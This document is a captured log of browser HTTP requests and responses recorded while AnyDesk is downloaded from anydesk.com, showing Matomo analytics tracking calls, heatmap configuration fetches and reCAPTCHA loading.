POST /matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=540590&h=16&m=8&s=14&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=DmXfPN&pf_net=0&pf_srv=7&pf_tfr=3&pf_dm1=138&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:15 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=8fkld6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=8fkld6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:15 GMT
content-type: application/javascript
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=946159&h=16&m=8&s=15&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=DmXfPN&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=946159&h=16&m=8&s=15&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=DmXfPN&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:16 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=939711&h=16&m=8&s=17&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=hrEkNY&pf_net=0&pf_srv=1&pf_tfr=2&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=939711&h=16&m=8&s=17&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=hrEkNY&pf_net=0&pf_srv=1&pf_tfr=2&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.2.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:17 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=PkAOxP&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=PkAOxP&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.2.1728144483689

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: application/javascript
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=238999&h=16&m=8&s=17&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pf_net=0&pf_srv=1&pf_tfr=2&pf_dm1=123&pf_dm2=411&pf_onl=9&pv_id=hrEkNY&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=238999&h=16&m=8&s=17&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pf_net=0&pf_srv=1&pf_tfr=2&pf_dm1=123&pf_dm2=411&pf_onl=9&pv_id=hrEkNY&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:18 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?action_name=Thank%20you%20for%20downloading%20AnyDesk&idsite=3&rec=1&r=074151&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&pf_net=0&pf_srv=4&pf_tfr=1&pf_dm1=105&pf_dm2=567&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?action_name=Thank%20you%20for%20downloading%20AnyDesk&idsite=3&rec=1&r=074151&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&pf_net=0&pf_srv=4&pf_tfr=1&pf_dm1=105&pf_dm2=567&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:28 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=RA4N7f&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe

msedge.exe

Remote address:

167.235.224.171:443

Request

GET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=RA4N7f&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe HTTP/2.0
host: ad-wa.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:28 GMT
content-type: application/javascript
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
POST

https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=942202&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

msedge.exe

Remote address:

167.235.224.171:443

Request

POST /matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=942202&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D HTTP/2.0
host: ad-wa.anydesk.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://anydesk.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.4.1728144483689

Response

HTTP/2.0 204

server: nginx/1.18.0
date: Sat, 05 Oct 2024 16:08:30 GMT
tk: N
access-control-allow-origin: https://anydesk.com
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
x-frame-options: DENY
referrer-policy: origin
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
GET

https://www.recaptcha.net/recaptcha/api.js?onload=recaptchaLoadedNewsletter

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api.js?onload=recaptchaLoadedNewsletter HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4evgzb17fsy2

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4evgzb17fsy2 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: worker
referer: https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4evgzb17fsy2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api.js?onload=recaptchaLoaded

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api.js?onload=recaptchaLoaded HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4zzyes9x2aij

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4zzyes9x2aij HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=5u82n46qpzr3

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=5u82n46qpzr3 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
